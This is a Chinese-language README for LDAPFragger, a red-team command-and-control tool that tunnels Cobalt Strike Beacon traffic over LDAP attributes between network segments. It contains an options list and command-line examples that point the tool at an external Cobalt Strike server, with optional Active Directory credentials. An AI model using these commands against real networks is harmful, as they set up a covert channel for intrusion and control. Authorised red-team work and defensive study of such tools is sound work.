LDAPFragger 是一款命令与控制工具,使攻击者能够通过 LDAP 用户属性路由 Cobalt Strike 的 Beacon 数据。
有关背景信息,请阅读发布博文:http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes
.NET 4.0 编译,但可能也适用于更早或更新的 .NET 框架版本 _ _ __
| | | | / _|
| | __| | __ _ _ __ | |_ _ __ __ _ __ _ __ _ ___ _ __
| |/ _` |/ _` | '_ \| _| '__/ _` |/ _` |/ _` |/ _ \ '__|
| | (_| | (_| | |_) | | | | | (_| | (_| | (_| | __/ |
|_|\__,_|\__,_| .__/|_| |_| \__,_|\__, |\__, |\___|_|
| | __/ | __/ |
|_| |___/ |___/
Fox-IT - Rindert Kramer
用法:
--cshost: Cobalt Strike 实例的 IP 地址或主机名
--csport: Cobalt Strike 服务器上外部 C2 接口的端口
-u: 连接 Active Directory 的用户名
-p: 连接 Active Directory 的密码
-d: Active Directory 域的 FQDN
--ldaps: 使用 LDAPS 替代 LDAP
-v: 详细输出
-h: 显示此消息
如果未提供 AD 凭据,将使用集成的 AD 身份验证。
使用示例:

从网络段 A 运行:
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>
从网络段 B 运行:
LDAPFragger
LDAPFragger -u <username> -p <password> -d <domain FQDN>
LDAPS 可通过 --LDAPS 标志使用,但常规 LDAP 流量也是加密的。请注意,默认的 Cobalt Strike 载荷会被大多数杀毒软件检测到。